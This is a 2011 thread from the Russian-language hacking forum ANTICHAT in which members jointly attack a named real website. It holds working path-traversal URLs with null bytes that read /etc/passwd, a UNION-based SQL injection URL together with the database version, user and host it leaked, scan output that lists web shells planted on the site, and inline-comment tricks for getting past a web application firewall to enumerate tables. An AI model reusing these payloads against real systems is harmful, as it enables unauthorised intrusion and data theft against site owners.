ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.05.2011, 16:12
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 20
Провел на форуме:
86381
Репутация:
16
|
|
Прошу:
http://www.libertarias.com/index.php?menu=4&op=../бла-бла%00
|
|
|
18.05.2011, 17:08
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Он на нулл-байт так реагирует, а не на "../"
|
|
|
|
18.05.2011, 17:42
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от ta-kyn
ta-kyn said:
Прошу:
http://www.libertarias.com/index.php?menu=4&op=../бла-бла%00
Там. три залитых шелла:
» http://www.libertarias.com/.htaccess HTTP 403 Forbidden
» http://www.libertarias.com/.htconfig HTTP 403 Forbidden
» http://www.libertarias.com/.htpasswd HTTP 403 Forbidden
» http://www.libertarias.com/.htaccess.1 HTTP 403 Forbidden
» http://www.libertarias.com/css/ HTTP 200 OK
» http://www.libertarias.com/img/ HTTP 200 OK
» http://www.libertarias.com/js/ HTTP 200 OK
» http://www.libertarias.com/stats/ HTTP 401 Authorization Required
» http://www.libertarias.com/temp/ HTTP 200 OK
» http://www.libertarias.com/c99.php HTTP 503 Service Unavailable
» http://www.libertarias.com/favicon.ico HTTP 200 OK
» http://www.libertarias.com/index.php HTTP 200 OK
» http://www.libertarias.com/r57.php HTTP 503 Service Unavailable
» http://www.libertarias.com/shell.php HTTP 503 Service Unavailable
|
|
|
|
18.05.2011, 18:02
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от FlaktW
FlaktW said:
Там. три залитых шелла:
» http://www.libertarias.com/c99.php HTTP 503 Service Unavailable
» http://www.libertarias.com/r57.php HTTP 503 Service Unavailable
» http://www.libertarias.com/shell.php HTTP 503 Service Unavailable
чё ж ты не заюзал эти шеллы, раз там они есть?)
это банальный случай, на сервере ids или аналог.
__________________
|
|
|
|
18.05.2011, 18:53
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Tigger
Tigger said:
Когда SQLi в GET-параметрах - палится легко, ты жестко следишь в логах, в POST или же COOKIE - нет, эти запросы в логи не попадают.
Если сервер грамотно настроен, то попадают
|
|
|
|
18.05.2011, 19:34
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от +toxa+
+toxa+ said:
чё ж ты не заюзал эти шеллы, раз там они есть?)
это банальный случай, на сервере ids или аналог.
Попробуй сам заюзать:
http://www.libertarias.com/index.php?menu=3&op=5&autor=-110')+union+select+1,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),3,4,5,6+--+
5.1.39-log:libertarias:libertarias@apache2-jolly.hector.dreamhost.comc-linux-gnu
|
|
|
|
18.05.2011, 19:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от ta-kyn
ta-kyn said:
Прошу:
http://www.libertarias.com/index.php?menu=4&op=../бла-бла%00
прошу
http://www.libertarias.com/index.php?menu=4&op=../../../../etc//passwd%00&a=0
|
|
|
|
19.05.2011, 10:19
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 20
Провел на форуме:
86381
Репутация:
16
|
|
Сообщение от freezed
freezed said:
прошу
http://www.libertarias.com/index.php?menu=4&op=../../../../etc//passwd%00&a=0
=). Благодарю. А почему ..../../etc //passwd%00... ?
|
|
|
|
19.05.2011, 10:21
|
|
Новичок
Регистрация: 16.12.2008
Сообщений: 2
Провел на форуме:
17542
Репутация:
0
|
|
Сообщение от Tigger
Tigger said:
Это называется WAF. Ищи в гугле способы обхода WAF. Я не думаю, что фильтруется table_name. Скорее всего FROM, либо таблица INFORMATION_SCHEMA. Это можно обойти так же комментариями, но не всегда. Впиши просто в запрос: id=1+union \ select \ table_name \ from и т.д., чтобы узнать что из этого фильтруется.
Когда SQLi в GET-параметрах - палится легко, ты жестко следишь в логах, в POST или же COOKIE - нет, эти запросы в логи не попадают.
А на счет безопасности тебе в соответствующий раздел читать статьи.
Спасибо что активно помогаешь новичкам в вопросах. Прочитал про WAF, честно говоря первый раз слышу. Ну я решил ввести весь запрос в комментарии. Вышло так: -1+union+/*!select+1,version(),3,4,5,6,7,8*/ Все работает. При таком запросе: -1+union+/*!select+1,table_name,3,4,5,6,7,8+from+INFORMATION _SCHEMA.TABLES+limit+1,1*/ Он не выводит названия таблиц (лимит менял на разные). Даже 2 дня назад когда (даже не знав о WAF) комментировал запрос table_name и запрос проходил без ошибок, то он все равно не выдавал названия таблиц. Подскажи куда копать дальше.
|
|
|
|
19.05.2011, 10:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от ta-kyn
ta-kyn said:
=). Благодарю. А почему ..../../etc
//
passwd%00... ?
просто потому, что /etc/passwd и еще часть файлов фильтруется, а другие можно и с одним слешем читать
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
